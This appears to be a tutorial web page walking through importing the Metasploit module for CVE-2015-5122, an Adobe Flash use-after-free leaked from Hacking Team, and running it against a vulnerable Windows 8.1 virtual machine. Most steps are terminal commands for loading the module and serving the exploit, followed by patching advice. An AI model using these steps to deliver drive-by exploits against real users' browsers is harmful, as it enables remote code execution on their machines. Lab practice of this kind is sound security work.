METASPLOIT

Metasploit CVE-2015-5122 Flash Exploit Tutorial

In this tutorial we will be importing the CVE-2015-5122 (Adobe Flash opaqueBackground Use After Free) zero day Flash Exploit module in Metasploit and have a vulnerable setup download the malicious Flash file. Recent versions of Adobe Flash Player contain critical vulnerabilities within the ActionScript 3 ByteArray, opaqueBackground and BitmapData classes. Exploiting one of these vulnerabilities could allow a remote attacker to execute arbitrary code on the vulnerable system. CVE-2015-5122 is the 3rd zero-day exploit from the Hacking Team data breach and targets the Adobe Flash Player (18.0.0.203) on Windows 7, Windows 8.1 and Google Chrome on Linux based computers. By the time of writing Adobe has already released security updates for Windows, Mac and Linux. This tutorial is for informational purposes only.

The Metasploit framework is a collection of tools and libraries that can be used to test the security of systems and networks. It is often used by security professionals to identify and exploit vulnerabilities in systems as part of a penetration testing or ethical hacking engagement.

An exploit is a piece of software, a chunk of data, or a sequence of commands that takes advantage of a vulnerability in order to cause unintended or unanticipated behavior to occur on computer software, hardware, or something electronic (usually computerized).

A “Flash exploit” specifically refers to a vulnerability in Adobe Flash Player, a software application that is used to view multimedia content and run applications on the web. Flash exploits allow an attacker to execute arbitrary code on a user’s system through a vulnerability in the Flash Player software.

It is important to note that the use of the Metasploit framework and other similar tools should only be done with the explicit permission of the owner of the systems being tested, and all testing should be conducted in a controlled and authorized manner. The Metasploit framework is a powerful tool that can be used for both legitimate and malicious purposes, so it is important to use it responsibly and ethically.

 

Metasploit CVE-2015-5122 Tutorial

First download the exploit code and make it available to Metasploit by creating an empty document and name it:

Adobe_Flash_HackingTeam_exploit.rb

Than download the payload here:

https://github.com/rapid7/metasploit-framework/tree/master/data/exploits/CVE-2015-5122

And add it to the following directory:

/usr/share/metasploit-framework/data/exploits/CVE-2015-5119/msf.swf

Now copy the exploit code and paste it into the document.

Metasploit CVE-2015-5122 Flash Exploit 1

Use the following command to copy the file from the desktop to the Metasploit modules folder (create the flash folder first if needed:
mv /root/Desktop/Adobe_Flash_HackingTeam_exploit.rb /usr/share/metasploit-framework/modules/exploits/windows/flash/

Use the following command to check if the file has been actually copied to the destination folder:

ls /usr/share/metasploit-framework/modules/exploits/windows/flash/

Metasploit CVE-2015-5122 Flash Exploit 2

Let’s open a new terminal and start Metasploit (and services if not already started) using the following command(s):
service postgresql start
service metasploit start
msfconsole

Metasploit CVE-2015-5122 Flash Exploit 3

Now we’ve got Metasploit up and running with our newly imported exploit loaded, we use the following command to search for it: || Metasploit Flash Exploi

search hackingteam

Now use the following command to use the newly added exploit:

use exploit/windows/flash/Adobe_Flash_HackingTeam_Exploit

Let’s check the options for Metasploit CVE-2015-5122 module with the following command:

show options

Metasploit CVE-2015-5122 Flash Exploit 4

We will keep the default options and type “run” or “exploit” to start the exploit:

exploit

Metasploit CVE-2015-5122 Flash Exploit 5

Let’s open the link from a Windows 8.1 virtual machine with a vulnerable browser (Firefox) and a vulnerable version of Flash Player (18.0.0.203) installed.

Metasploit CVE-2015-5122 Flash Exploit 6

How to avoid getting infected by CVE-2015-5122 and other exploits…

– Update Flash Player and keep it up-to-date.
– Install security patches and keep your OS up-to-date.
– Install a virus scanner and firewall and keep it updated.
– Keep your browser up-to-date.
– Do not install unneeded plug-ins.